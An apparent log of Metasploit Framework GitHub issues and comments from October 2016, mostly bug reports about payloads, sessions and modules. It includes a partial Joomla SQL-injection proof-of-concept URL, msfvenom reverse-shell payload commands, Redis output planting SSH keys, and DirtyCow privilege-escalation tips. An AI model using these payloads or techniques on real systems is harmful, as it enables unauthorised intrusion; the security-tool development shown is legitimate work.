Awesome! Just write in if you need help. No pressure to add the fedora one as well, that can be a second PR that adds on.
Besides, if it helps, my first pr #4888 crashed the framework and had to be rewritten #5307.

[2016-10-15 23:21] mubix opened #7448 "CVE-2016-6433 - Post-auth Cisco Firepower Management Console RCE"
- Blog - https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking
- Python Code - https://blog.korelogic.com/2016/10/10/virtual_appliance_spelunking/kl-cisco-firepower-rce.py

[2016-10-16 01:10] h00die commented on #7443
i'm going to get started on this now. claimed!

[2016-10-17 05:56] wvu-r7 commented on #7448
I'll take a look at this on Monday. Looks easy enough.

[2016-10-17 10:28] djclarkson commented on #6154
Sam issue targeting Windows Vista.

[2016-10-17 14:27] jvoisin commented on #7438
I didn't know about the `rexploit` command, thank you for the tip ;)

[2016-10-17 14:45] h00die commented on #7438
This is kind of old school mentality, but I write resource files for all my modules. If my module fails during dev, it lets me easily reset the entire msf environment (and initial shell I'm using), plus gives me time to revert the VM.

[2016-10-17 14:59] h00die commented on #7216
@JohnMartinelli any updates?

[2016-10-17 15:48] wvu-r7 commented on #7438
@jvoisin: You can use ```rerun``` as well, and it'll be the same command regardless of module type.

[2016-10-17 18:00] e13fter opened #7452 "BUG - lib/rex/exploitation/omelet.rb searchforward option is always true"
Logical error in file lib/rex/exploitation/omelet.rb.
It seems that dev had forgotten to fix code after tests and left line
[code]
which made this option to be always true.

[2016-10-17 18:53] ajaxtpm opened #7453 "xxx"
xxx

[2016-10-17 18:55] #7453 closed

[2016-10-17 19:24] ptresearch opened #7455 "ie_uxss_injection implicitly required URIPORT to be set explicitly"
Configuration is the following:

  Name        Current Setting                                 Required  Description

---

  CUSTOMJS                                                    no        Custom JavaScript
  SRVHOST     0.0.0.0                                         yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT     8080

[2016-10-17 20:26] wvu-r7 commented on #7455
@wchen-r7: Can you please take a look at this? The module implements its own ```get_uri```.

[2016-10-17 22:58] wvu-r7 commented on #7452
Looks like a default to me. Try setting ```searchforward: false``` (```:searchforward => false```) in the options hash to ```generate_omelet```.

[2016-10-18 01:01] wvu-r7 commented on #7448
@mubix: Do you have the trial software? It's heavily restricted... or I can go for some shady Chinese torrents.

[2016-10-18 10:27] e13fter commented on #7452
I don't know ruby :(, but before I removed this `|| true`, setting `searchforward` in options didn't make sense. After removing, the option began to work.

[2016-10-18 16:55] wvu-r7 commented on #7452
Take a look at ```modules/exploits/windows/ftp/seagull_list_reply.rb``` for an example of how to set ```:searchforward```. You should be using the mixin ```Msf::Exploit::Omelet``` if possible.

[2016-10-18 19:28] e13fter commented on #7452
Yes, I'm using it the same way (https://gist.github.com/e13fter/17af851ad04412264e380e013a70da21). In your example option `:searchforward` is set to `true` and so it doesn't have any problems, because `true || true == true`. But if you try to set it to false, it remain true all the same, because `false || true == true`.

[2016-10-18 19:38] pbarry-r7 commented on #7452
Sounds like this might be a similar situation to this old PR: https://github.com/rapid7/metasploit-framework/pull/7030

[2016-10-18 19:42] bcook-r7 commented on #7452
I think it could be similar to that @pbarry-r7 . This might be an archaic workaround for when the datastore did not properly encode boolean values as true/false but instead stored the strings "true" or "false", which meant the only time this code would trigger (indirectly) was on nil.

[2016-10-18 19:58] e13fter commented on #7452
You can use my script (link above) to test this. This script make it possible to take metasploit payload and generate omelet and eggs for it. You will see that omelet shellcode is the same in both cases with `searchforward` option.

[2016-10-18 21:47] ng1905 opened #7458 "android/meterpreter/reverse_tcp infinite connections"
## Steps to reproduce

1. msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw > app.apk
2. use android/meterpreter/reverse_tcp
3. set LHOST [IP]
4. set LPORT [PORT (4444 in my case)]
5. set ExitOnSession false
6. run -j

1st target:
Nexus 5x running Android 7.0 (Nougat)

2nd target:
Samsung Galaxy S4 (GT-I9505) running Android 5.0.1 (Lollipop)

## Expected behavior

The handle

[2016-10-18 22:41] wvu-r7 commented on #7452
Hmm, I must have misread this. Apologies. I've reopened the issue pending further investigation.

[2016-10-19 02:54] pbarry-r7 commented on #7452
@e13fter, I used your script (thx!) and verified the behavior you described.  I'll PR a simple fix for review.

[2016-10-19 03:48] #7452 closed

[2016-10-19 04:06] wvu-r7 commented on #7452
I've landed the fix. Sorry for being stupid about this.

[2016-10-19 04:07] wvu-r7 commented on #7452
I've landed the fix. Sorry for being stupid about this. I honestly didn't pay close enough attention.

[2016-10-19 04:13] pbarry-r7 commented on #7452
Thanks for the review+land, @wvu-r7!  :+1:

[2016-10-19 08:02] bcook-r7 commented on #7458
"The Problem is that I did not change any of the used payloads on my two target devices."

Are you saying you generated the payload with an older version of metasploit, and are testing the payload against the latest framework?

[2016-10-19 08:32] timwr commented on #7458
I think I broke backwards compatibility with older staged payloads. Let me see if I can fix it.

[2016-10-19 10:23] ng1905 commented on #7458
"Are you saying you generated the payload with an older version of metasploit, and are testing the payload against the latest framework?"
This is exactly what I was trying to say.

"I think I broke backwards compatibility with older staged payloads. Let me see if I can fix it."
I just saw the commit; how am I able to check the result with this change? Or does it come with the next update?

Thanks

[2016-10-19 12:51] e13fter commented on #7452
Thanks very much to all!

[2016-10-20 03:27] xl7dev opened #7463 "auxiliary/scanner/redis/file_upload"
msf auxiliary(file_upload) > run

[_] Scanned  33 of 256 hosts (12% complete)
[_] Scanned  56 of 256 hosts (21% complete)
[_] Scanned  86 of 256 hosts (33% complete)
[_] Scanned 106 of 256 hosts (41% complete)
[_] Scanned 128 of 256 hosts (50% complete)
[+] 10.11.102.134:6379    - 10.11.102.134:6379    -- saved 402 bytes inside of redis DB at /root/.ssh/authorized_keys
[-] Auxiliary failed: NoMeth

[2016-10-20 15:53] ghost opened #7464 "Error when running run vnc in metasploit"
meterpreter > run vnc
[_] Creating a VNC reverse tcp stager: LHOST=192.168.1.182 LPORT=4545
[_] Running payload handler
[_] VNC stager executable 73802 bytes long
[_] Uploaded the VNC agent to C:\Users*******_1\AppData\Local\Temp\wnlNarB.exe (must be deleted manually)
[_] Executing the VNC agent with endpoint 192.168.1.182:4545...
[-] Error in script: Rex::Post::Meterpreter::RequestError stdapi_sy

[2016-10-20 17:31] madmike33 opened #7465 "ReQuest {joomla exploit}"
A new 0DAY for joomla i did a research and found lots of webs.... i guess it worth an msfmodule
Its an SQL INJECTION Joomla component ja-k2-filter-and-search.

POC:  (WhateverSite)/index.php?category_id=(select%201%20and%20row(1%2c1)%3E(select%20count(_)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHAR(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)%2cCHAR(77))%2cfloor

[2016-10-20 18:03] h00die commented on #7464
File not found, can you confirm wnlNarB.exe is there? Maybe AV caught and removed it.

[2016-10-20 20:03] kingcraftingnl commented on #7464
It isnt there and the AV was turned off the AV its Avast i disabled all the shields and even added the stub to the Ignore list

[2016-10-20 20:59] claudijd commented on #6863
@bcook-r7 sorry for the delay here, I was traveling and on vacation for a while and I'm just now catching my breath.  As per the per the pre-release, we really haven't gotten much feedback good/bad/meh.  Since the feature doesn't actually affect default parsing logic, I think we can probably move forward with a prod release soon.

[2016-10-20 22:56] VasLem opened #7466 "data/exploits/cmd_stager folder missing"
## Steps to reproduce

How'd you do it?

1. Upgrade to latest version through git
2. Found out it was missing when I tried to run sessions upgrade command and vbs_b64 could not be found.

## System stuff

### Metasploit version
Framework: 4.12.35-dev-85c26c6
Console  : 4.12.35-dev-85c26c6

### I installed Metasploit with:
- [ ] Source install (Ruby 2.3.1p112)

### OS

What OS are you running Metas

[2016-10-20 23:02] VasLem commented on #7466
Easy fix if you are keeping backups (no doubt about it :D).

[2016-10-21 03:21] busterb commented on #7466
Ping @dmaloney-r7

[2016-10-21 11:53] nixawk commented on #7464
@kingcraftingnl

- **Lab**: Windows  7 x64

[code]

[2016-10-21 12:47] jvoisin opened #7467 "Module Request: Linux Local CVE-2016-5195 (dirtycow)"
CVE-2016-5195 (aka [DirtyCow](https://dirtycow.ninja/)) is an interesting privesc, with a [PoC available](https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c).

![dirtycow logo](https://dirtycow.ninja/cow.svg)

The interesting part is that the [exploit](https://gist.github.com/scumjr/17d91f20f73157c722ba2aea702985d2) is super-reliable, and bypasses _everything_: grsecurity, selin

[2016-10-21 12:56] nixawk commented on #7467
[code]

[2016-10-21 12:58] mahmoudissam commented on #7458
Yes the same is happening to me, when I upgraded to v4.12.34-dev , all the commands are not working (pwd, ls...etc).

This is happening to the payloads I generated in the old framework version.

So I had to revert back to v4.12.32-dev.

Thanks,
Mahmoud

[2016-10-21 13:15] nixawk commented on #7466
@VasLem Could you share how to gain the new session, and the details of `session -u` ?
I want to fix your issue.

[2016-10-21 13:34] h00die commented on #7467
I got a pentest right now, and am working on the ipv6_tables priv esc, up for grabs!

[2016-10-21 13:37] anantshri commented on #7467
just a note for whosoever tries this out. the action is limited to the size of the file. so your overwriting payload should be within the size of the existing file.

[code]
Not sure if its critical info but something where i wasted some time. don't want another person to waste time on that issue.

[2016-10-21 14:29] wvu-r7 opened #7468 "Dirty COW (CVE-2016-5195)"
https://dirtycow.ninja/

[2016-10-21 14:43] wvu-r7 commented on #7468
Dupe!

[2016-10-21 14:43] #7468 closed

[2016-10-21 14:45] sempervictus commented on #7467
If nobody else has time today, i can port it this evening. Currently trying to divine cleanup approach:
Thinking we read original contents into memory, write payload + NOP buffer to original size into the CoW mapping, exec the resulting bin, then write back the original memory contents into the payload+buffer sized file (since we cant write more than the filesize and need to stuff the original con

[2016-10-21 14:46] wvu-r7 commented on #7467
[code]

[2016-10-21 17:07] dmaloney-r7 commented on #7001
Issue resolved by https://github.com/rapid7/metasploit-framework/pull/7469

[2016-10-21 21:08] pbarry-r7 commented on #7466
# Release Notes

This patch fixes a recent breakage when attempting to upgrade a session (*sessions -u*).  The breakage was related to some missed file references when we moved cmdstagers out of MSF into a new rex-exploitation gem.

[2016-10-21 21:09] dmohanty-r7 commented on #7207
same here...

[code]

@wchen-r7, please verify if you are still getting this with the latest codez

[2016-10-21 22:33] VasLem commented on #7466
Ok, I can confirm it was fixed, thank you!

[2016-10-22 01:11] Occupy4Elephants opened #7471 "db_import not importing properly"
## Steps to reproduce

service postgresql start
msf> db_import targetfilename.xml
import successful

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.
## Expected behavior

Results from acunetix XML file should be imported in workspace and hosts, service

[2016-10-22 04:17] nixawk opened #7472 "censys_search"
@madmike33 @mubix A demo module for censys, and I'll give a new pr later.

[code]

[2016-10-22 04:56] #7472 closed

[2016-10-22 09:46] Spyro289 opened #7474 "Meterpreter x64 crashes whether injected into process or manually ran by the user in metasploit framework"
I was compromised a windows 7 machine but realised that I could not escalate myself to system level
because all the process had an x64 architecture ,with the process list opened in armitage I attempted to inject a "a x64 version of the reverse_tcp Meterpreter" into explorer.exe which had an x64 architecture
but explorer.exe crashed realising this I manually dropped the payload onto the virtual mac

[2016-10-22 12:52] nixawk commented on #7467
[code]

[2016-10-22 12:55] hytd opened #7475 "error: Invalid payload specified!"
run

msfvenom -p windows/meterpreter/reverse_tcp -f exe > test.exe

error

windows 7 x64 run test.exe prompt

Not a valid win32 program

help me

farmword version: 4.12.22-dev

system:kali(2016-07-21)

I did not update the system

[2016-10-22 12:57] h00die commented on #7467
I see no PRs :(
Who writes a linux local module that uses gcc to compile live on target?! This is crazy talk #sarcasm

[2016-10-22 13:04] nixawk commented on #7467
@h00die [CVE-2016-5195 - DirtyCow privilege escalation](https://github.com/rapid7/metasploit-framework/pull/7476).

- OS will be down when the root session is gained.

[2016-10-22 14:28] hytd commented on #7475
run

msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.x.xlport=4444 -f exe -o test.exe

prompt

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: test.exe

[2016-10-22 14:38] nixawk commented on #7475
Please try **`-f exe-only`**,

[code]

[code]

[2016-10-22 15:09] hytd commented on #7475
run x86 prompt

No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe-only file: 73802 bytes
Saved as: evil.exe

run x86_64 prompt

No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe-only file: 6144 bytes
Saved as: evil.exe

win7 x64 run evil(x86 and x86_64) prompt

This file and version are not compatible

[2016-10-22 15:26] hytd commented on #7475
I was running directly msfvenom (/usr/bin/msfbenom)

No (./)

metasploit path (/usr/share/metasploit-framework)

[2016-10-22 15:52] nixawk commented on #7475
What's the OS lab version ? Details will be more helpful.

[2016-10-22 16:10] xl7dev commented on #7463
@dmohanty-r7

(error) READONLY You can't write against a read only slave

I have solved it in other ways.
Slave-read-only=1, default slave-read-only=0

[2016-10-22 16:15] hytd commented on #7475
run uname -a prompt

Linux bogon 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux

run cat /proc/version prompt

Linux version 4.6.0-kali1-amd64 (devel@kali.org) (gcc version 5.4.0 20160609 (Debian 5.4.0-6) ) #1 SMP Debian 4.6.4-1kali1 (2016-07-21)

run cat /etc/issue prompt

Kali GNU/Linux Rolling \n \l

run getconf LONG_BIT prompt

64

run cat /proc/cpuinfo prompt

proc

[2016-10-22 17:25] madmike33 commented on #7472
Thnx ;)

[2016-10-22 17:28] madmike33 commented on #7465
@nixawk interested ?

[2016-10-22 19:40] sempervictus opened #7477 "PortForwards Being Improperly Assigned"
When running multiple meterpreter sessions (python and mettle), port forwards added in a python meterp session show up in the mettle ones (when issuing a cmd_portforward with no args). Moreover, if a port is forwarded on a second session it crashes the session and breaks the first forwarded port. Looks like we're overwriting a tracker reference or something when the second one is created, haven't

[2016-10-22 20:49] naterobbified commented on #6783
Anyone find a way to resolve this error? Got the same error while attempting a different metasploit exploit recently.

[2016-10-23 14:43] kthemis commented on #7467
therer is always an error"Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION."
![default](https://cloud.githubusercontent.com/assets/20766295/19627102/0dcc6b08-9972-11e6-8476-0ad4e0fa0087.PNG)

[2016-10-23 15:04] pbarry-r7 commented on #7467
@kthemis, did you have a valid session before attempting to use dirtycow?  You'll need to have a working session on the target before attempting to escalate privilege and set the module's SESSION option value to that working session number.

[2016-10-23 15:24] kthemis commented on #7467
@pbarry-r7 Is there any way to get the session ID?

[2016-10-23 15:46] wvu-r7 commented on #7467
@kthemis: Seems like you don't have a shell. Get one.

[2016-10-23 15:50] kthemis commented on #7467
@pbarry-r7 If I have a "www-data" shell,what's next？

[2016-10-23 15:54] pbarry-r7 commented on #7467
@kthemis, the msfconsole ```sessions``` command will show what active sessions (and their associated numbers) are.

[2016-10-23 16:46] kthemis commented on #7467
Oh,pretty good.But there was a new error~~
”[!] This exploit may require manual cleanup of '/tmp/xRROLBfdwS' on the target
[!] This exploit may require manual cleanup of '/tmp/xRROLBfdwS.out' on the target“ @pbarry-r7

[2016-10-23 16:50] wvu-r7 commented on #7467
@kthemis: See if those files still exist. If they do, delete them. Looks like ```FileDropper``` is failing for any number of potential reasons. (Yes, it's that finicky.)

[2016-10-23 17:10] kthemis commented on #7467
There is  just only one C file in the targert directory.

[2016-10-23 17:11] kthemis commented on #7467
There is just only one C file in the targert directory. @wvu-r7

[2016-10-23 17:14] wvu-r7 commented on #7467
@kthemis: Maybe you don't have GCC. ¯\_(ツ)_/¯

[2016-10-23 17:15] wvu-r7 commented on #7467
@kthemis: Maybe you don't have GCC. ¯\\\_(ツ)_/¯

[2016-10-23 17:44] #7458 closed

[2016-10-23 17:45] kthemis commented on #7467
Thanks a lot ,i'm just a beginners:).But now I hvae an another error:"Exploit failed: Rex::TimeoutError Operation timed out" @wvu-r7

[2016-10-23 17:45] kthemis commented on #7467
Thanks a lot ,I'm just a beginner:).But now I hvae an another error:"Exploit failed: Rex::TimeoutError Operation timed out" @wvu-r7

[2016-10-23 18:24] wvu-r7 commented on #7467
@kthemis: Is your session still up?

[2016-10-23 19:05] 404Ghost99 opened #7479 "Exploit aborted"
hi, i'm using kali rolling and metasploit v4.12.36-dev-ce1f3e6, and i'm using exploit ms08_067_netapi, but when i'm trying attack to the target(windowsXP) metasploit said [-] xxx.xxx.xxx.33:445 - Exploit aborted due to failure: no-target: No matching target. can u help me please?

*target firewall off*
*No AntiVirus on target*

[2016-10-23 21:35] wvu-r7 commented on #7479
And your target is...?

[2016-10-23 21:36] wvu-r7 commented on #7479
Set a specific target for XP. It should have fingerprinted in auto mode, but it didn't. SOMETHING'S WRONG. :D

[2016-10-24 00:39] OJ commented on #7474
My money is on at least one of the following:

* Injecting into an x64 process when running as an x86.
* Launching x64 payloads that connect back to an x86 handler.

If you're doing either of the above, it'll crash.

For future reference, please use the [Rapid7 community](https://community.rapid7.com/) when you are having issues using the software. Github issues are intended for bug reports only.

[2016-10-24 00:39] #7474 closed

[2016-10-24 00:49] kthemis commented on #7467
Yes,my session is still up.But when a new session created,I can't get a meterpreter shell.
It also can find that the target machine has been down. @wvu-r7

[2016-10-24 02:03] busterb commented on #6452
/dev/shm is a good place to put files on most recent linux systems. tmpfs is ram-backed and doesn't survive reboots. I'd feel somewhat confident that unlink actually frees the backing pages back to the vm subsystem, rather than leaving blocks hanging around.

[2016-10-24 02:24] bcook-r7 commented on #7479
This is really too vague of a report for us to fix. Please look at ms08_067_netapi, note that it has to be targeted exactly for a language and patch level. We can't do anything without that information.

[2016-10-24 02:24] #7479 closed

[2016-10-24 02:26] OJ commented on #7479
@404Ghost99 please refer to [the support site](https://community.rapid7.com/) for future support requests. Github is for bugs in Metasploit itself. Thanks.

[2016-10-24 03:04] wvu-r7 commented on #6452
Thanks for your input, @bcook-r7! I've been using that trick for years now, and it works great, but sometimes I find mounts that are noexec and/or nosuid, and any good sysadmin worth their salt will look in that directory. We should keep it in mind for FileDropper 2.0, though. :)

[2016-10-24 03:05] wvu-r7 commented on #6452
Thanks for your input, @bcook-r7! I've been using that trick for years now, and it works great, but sometimes I find mounts that are ```noexec``` and/or ```nosuid```, and any good sysadmin worth their salt will look in that directory. We should keep it in mind for ```FileDropper``` 2.0, though. :)

[2016-10-24 03:40] wvu-r7 commented on #7465
@madmike33: Can you provide some comparative stats on how common this extension is?

[2016-10-24 03:52] megabug opened #7482 "Unhandled DBG_PRINTEXCEPTION_C exception using meterpreter"
I'm writing my own exploit module for a vuln I've found. The exploit needs to function differently depending on the target, namely:
- whether it's 32-bit or 64-bit (for the ropchains), and
- whether it's running on Windows 7 and below, or Windows 8 and above (for the different heap spraying required).

Using the 32/64bit reverse TCP staged meterpreter payloads, I get the following results:
- Windo

[2016-10-24 04:58] hytd commented on #7475
thank you

[2016-10-24 04:59] hytd commented on #7475
The wrong reason is that I use the ftp command to upload exe file

[2016-10-24 05:03] hytd commented on #7475
Because I use virtualbox so copying files inconvenient

So I run the ftp command

ftp

ftp>open 992.168.x.x
ftp>put evil.exe
ftp>exit

The ftp command may be uploaded using             ASSIC

[2016-10-24 05:04] #7475 closed

[2016-10-24 08:18] ondj opened #7483 "run_cmd does not work after interacting with sessions"
## Steps to reproduce
1. Create new Meterpreter sessions
2. Interact with the sessions `sessions -i 1`
3. Send session to background
4. Use `run_cmd` from Metasploit irb console (for example `framework.sessions[1].run_cmd("ps")`)

Without interacting with the session (step 2 and 3), everything works fine
## Expected behavior

The command outputs list of all processes and `true` return value for `r

[2016-10-24 09:59] megabug commented on #7482
`msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -a x86_64 --platform win` works fine when manually executed in the Win7 64bit instance, so I guess I'm doing something wrong when transferring into meterpreter...

[2016-10-24 12:36] nixawk commented on #7483
@ondj Could you show the pwned lab information ?  It runs ok against **Ubuntu 14.04 x64**.

[code]

[2016-10-24 13:24] ondj commented on #7483
Hi, thanks for reply. I not tried `windows/shell/reverse_tcp` and it works well. But in my first example, I am using Meterpreter session. Example:

[code]

[2016-10-24 17:11] lukapusic opened #7486 "Exploit apache_mod_cgi_bash_env_exec - progress over 100%"
## Problem:

This might only be a display bug. Exploit apache_mod_cgi_bash_env_exec displays command Stager progress as 100.60% done (837/832 bytes). Obviously, the progress should stop at 100%.
## Steps to reproduce
1. use exploit/multi/http/apache_mod_cgi_bash_env_exec
2. set payload linux/x86/meterpreter/reverse_tcp
3. set lhost 10.11.0.xx
4. set lport 5555
5. set rhost 10.11.1.xx
6. set target

[2016-10-24 18:01] wvu-r7 commented on #7486
Seen this before, forgot why it happens. Module is probably still broken, anyway. I just use ```curl``` and friends, tbh.

[2016-10-24 20:16] wchen-r7 opened #7487 "Stager fails to load using windows/meterpreter/reverse_tcp with badchars = '\0x00'"
While testing [this vulnerability](https://github.com/rapid7/metasploitable3/pull/17) for Metasploitable3, James and I are noticing windows/meterpreter/reverse_tcp is always causing this error:

**Errno::ECONNRESET Connection reset by peer - SSL_accept**

msfconsole output:

[code]

The backtrace:

[code]

If we use windows/shell_reverse_tcp, the payload session works properly. So at first glance,

[2016-10-25 10:10] kthemis commented on #7467
I have tried to use the latest dirtycow.rb,but there is still a error:
![x](https://cloud.githubusercontent.com/assets/20766295/19682022/50c759aa-9ade-11e6-83bf-17a442300417.PNG)
And then,the target machine is dead!!!!!!!!!

[2016-10-25 18:19] OJ commented on #7464
Is Windows defender disabled?

By the way, GitHub issues are not intended as a support forum. Please use
https://community.rapid7.com instead.

[2016-10-25 23:23] wchen-r7 opened #7492 "Support HTML::base64 encoding for exploit/windows/browser/ms10_002_aurora"
Originally reported by Sahil Uppal from the community:
https://community.rapid7.com/thread/9186

The exploit/windows/browser/ms10_002_aurora module currently does not support the HTML::base64 encoding option, but it is made available. Sahil Uppal suggests we should use the send_response_html method instead of send_response to be able to support HTML encoding.

[2016-10-26 01:25] bcook-r7 commented on #7487
I can reproduce, checking it out now.

[2016-10-26 02:18] bcook-r7 commented on #7487
looks related to the size of the stage. If I shrink it by 32k (removing some code), it works.

[2016-10-26 02:19] bcook-r7 commented on #7487
this started failing around metasploit-payloads 1.1.21 or so, when adding the localtime command. that seems to have pushed the size threshold over.

[2016-10-26 09:53] c0d3xpl0it opened #7494 "Updating Latest Mimikatz Support"
Hello,

Is there a roadmap for upgrading the Mimikatz to latest version by @gentilkiwi which supports Windows 10 Anniversary update & Windows Server 2016 (1607 - build 14393) ?

[2016-10-26 10:00] bcook-r7 commented on #7487
PR submitted for the original issue, but this can be reproduced more directly (will update the title)

./msfvenom -p windows/meterpreter/reverse_tcp -f exe -o ../metasploitable3/test.exe LHOST=172.28.128.1 -b '\x00'

[2016-10-26 10:10] megabug commented on #7482
So a simple test program that does a stack pivot before jumping to `windows/x64/meterpreter/reverse_tcp` fails in the same way. I'm guessing that the broken stack stops the exception from getting to the default handler normally near the bottom of the stack.

It looks like debug messages got enabled by @OJ's commit rapid7/metasploit-payloads@0cbb86c a few months ago - perhaps by accident?

[2016-10-26 10:11] bcook-r7 commented on #7482
Hmm, that should be disabled @megabug - thanks for the catch.

[2016-10-26 10:20] bcook-r7 commented on #7487
darn it, debug info being enabled by default seems to have caused the underlying problem (itself also a not-quite-explainable problem yet, but it does at least have a more general fix) - thanks @megabug for noticing this.

[2016-10-26 10:50] bcook-r7 commented on #7482
in #7493 I rebuilt a metasploit-payloads gem without debug enabled. Does this resolve your issue @megabug ?

[2016-10-26 12:44] am118 opened #7495 "problem ssl conection with metasploit - exploit/multi/http/manageengine_auth_upload"
hi
when i use "exploit/multi/http/manageengine_auth_upload" and enable ssl "true" have a problem with

"OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=error: dh key too smal"

target : manageengine v9
my link : https ://test.com:443
please help me

[2016-10-26 15:48] OJ commented on #7494
We're actively working on this at the moment (and this issue is a duplicate of a few others, so I'm going to close this one). Thanks.

[2016-10-26 15:48] #7494 closed

[2016-10-26 19:16] ViRb3 opened #7496 "reverse_https stager doesn't send stage to Windows XP"
## Steps to reproduce
1. Create a _windows/meterpreter/reverse_https_ payload
2. Deploy it on a Windows XP SP3 machine

NOTE: _meterpreter_reverse_https_ (without staging) works perfectly!
## Expected behavior

Connect back to the msfconsole handler, get the stage (full meterpreter DLL) and reflectively load it.
## Current behavior

The connection is established according to "netstat -b", but this

[2016-10-26 20:24] #7487 closed

[2016-10-26 21:22] OJ commented on #7496
This makes me sad.

[2016-10-27 09:11] ViRb3 commented on #7496
@OJ Do you have any clue where the problem could be? I can try debugging later on, but my environment and time are very limited.

[2016-10-27 12:39] OJ commented on #7496
I have a few ideas. I'll see if I can find time to look at this at some point today.

[2016-10-27 16:19] bwatters-r7 opened #7500 "Column padding is off for unicode values"
## Steps to reproduce

The fastest way to reproduce this is:

[code]

Example:

[code]

Check the column width of the columns containing unicode in the output.  Looking at it, it appears that there is a predictable lack of spaces- namely, there needs to be one space added for each unicode character.  Likely, this is because when the padding is calculated, it relies on bytes rather than the number

[2016-10-28 00:08] wvu-r7 commented on #7495
Please see #6783.

[2016-10-28 00:08] #7495 closed

[2016-10-28 01:35] h00die commented on #7444
@justinsteven hows it going? Need any help or guidance or anything?

[2016-10-28 07:08] therealkbhat commented on #7500
I'd like to work on this.

I've identified that `dump_options`, `dump_advanced_options` and `dump_evasion_options` in `lib/msf/base/serializer/readable_text.rb` are functions of interest. However, because `indent.length` is set for the entire table, I'm trying to pad the "Current Setting" strings with the appropriate number of spaces.

I've defined the following in the `ReadableText` class:
[code]

[2016-10-28 10:27] megabug commented on #7482
Yeah it does, thanks!

[2016-10-28 10:27] #7482 closed

[2016-10-28 11:41] jvoisin opened #7503 "Mettle doesn't work without a tty"
It seems that mettle doesn't play nice when the shell isn't a `tty`:
### With `mettle`

[code]
### With `shell_reverse_tcp`

[code]

[2016-10-28 19:11] truekonrads opened #7504 "Cannot override payload in shell_to_meterpreter.rb"
The shell_to_meterpreter.rb  has a two bugs:
1) There is a typo on line 119:
It says:

[code]

When it should say:

[code]

as On 41-42 it says:

[code]

Second, when that's "fixed", upgrade of x64 psh shell to a x64 meterpreter doesn't work (x64 psh to x86 meterpreter works tho),  I can't repro that bug on that environment as I don't have access to the target anymore.

[2016-10-29 01:15] wvu-r7 commented on #7504
Feel free to submit a patch!

[2016-10-29 05:13] justinsteven commented on #7444
Hey @h00die. Getting there. I've gotten bogged down in some stuff, and so this got put on the backburner. I've got a good start - just need to fine-tune the escalation method (hooking via `ld.so.preload` can be fragile and I want to do a good job of it), make it work across all Tomcat versions, and fix some TODOs. If someone can't wait for my nonsense to settle down so I can get back to it, happy

[2016-10-29 06:54] am118 commented on #7495
i see this post #6783. .. but nofixed my problem

[2016-10-29 12:42] h00die commented on #7444
no prob, just wanted to make sure you were still working on it and there wasn't any issues that i/we could help out with.

[2016-10-29 17:53] wvu-r7 commented on #7495
I mean let's move to that ticket, since this is a duplicate. Please leave a comment there. Thanks.

[2016-10-29 21:48] bwatters-r7 commented on #7500
Hello and welcome, @therealkbhat!  Thank you very much for your response and welcome to the project!  Your description let me find the root problem in just a few minutes, and I think the it might have been my fault you did not see it first.  The final problem is not actually in `metasploit-framework`, but in `rex-text`, a separate Gem `metasploit-framework` uses to manipulate text.  The problem ca

[2016-10-30 05:02] zeroSteiner commented on #7143
Closing this because PR #7510 was landed.

[2016-10-30 05:02] #7143 closed

[2016-10-30 10:19] therealkbhat commented on #7500
Thanks for the comprehensive reply! I'll keep commenting here rather than under `rex-text` for the sake of continuity.

I agree, going with option (2) seems the easiest way to handle this. Unicode strings are now properly handled in the pad function.

What I'm now doing is encoding (as UTF-8) strings that come into `pad`.
[code]
While this fixes most cases, there is still a problem when the Unicod

[2016-10-31 02:48] aushack commented on #7465
https://www.joomlart.com/joomla/extensions/ja-k2-search

Downloads:165,876

[2016-10-31 03:34] wvu-r7 commented on #7465
@aushack: Saw that. Was looking for a comparison/justification, since we don't want a repeat of wpsploit.

[2016-10-31 03:48] #7504 closed

[2016-10-31 03:50] valerianrossigneux opened #7513 "Meterpreter https not handling requests after some time"
Hi, I'm running a reverse_https meterpreter on a server and I have clients successfully connecting to it, I can see the sessions being created etc.

I have observed that *after some time*, if I run the client again, I don't see anything on the server, the request is not handled. If I restart the handler then it works again.

I'm wondering what would be the cause of that, any idea ? The only thing

[2016-10-31 03:54] valerianrossigneux commented on #7101
Observed the same behavior. Could it be caused by robots hitting the handler and somehow breaking it ?

[2016-10-31 03:58] mubix commented on #7513
cc: #7101 I've observed the same issue recently, no indication at all on the handler side that anything has gone wrong

[2016-10-31 03:58] mubix commented on #7101
@valerianrossigneux Are you ok with tracking this issue here, instead of the new issue you created? in #7513

[2016-10-31 03:59] mubix commented on #7101
cc @OJ @bperry-r7 - since you guys are working pretty deep on Met* right now. Any ideas?

[2016-10-31 04:59] valerianrossigneux commented on #7101
@mubix yes sorry poor bug creation hygiene on my side, let's track it here as it is more comprehensive.

[2016-10-31 05:02] #7513 closed

[2016-10-31 05:03] mubix commented on #7513
Being tracked in #7101

[2016-10-31 05:09] mubix commented on #7101
I've created a simple script to track when it fails without having too much crazy happen on the handler side (I like my logs clean). It's pretty jenky but it gets the job done. I'm curious how long it is before it breaks. See if we can get a consensus going "mean time to failure"

[code]

[2016-10-31 08:19] RealRancor opened #7514 "exploit/linux/misc/drb_remote_codeexec fails on recent ruby versions with $SAFE = 1"
## Steps to reproduce

1. Setup timeserver code from http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/ on a recent Debian Jessie with ruby 2.1.5
2. Use $SAFE = 1
3. Run exploit/linux/misc/drb_remote_codeexec against this target

## Expected behavior

The exploit should work and a shell should be opened

## Current behavior

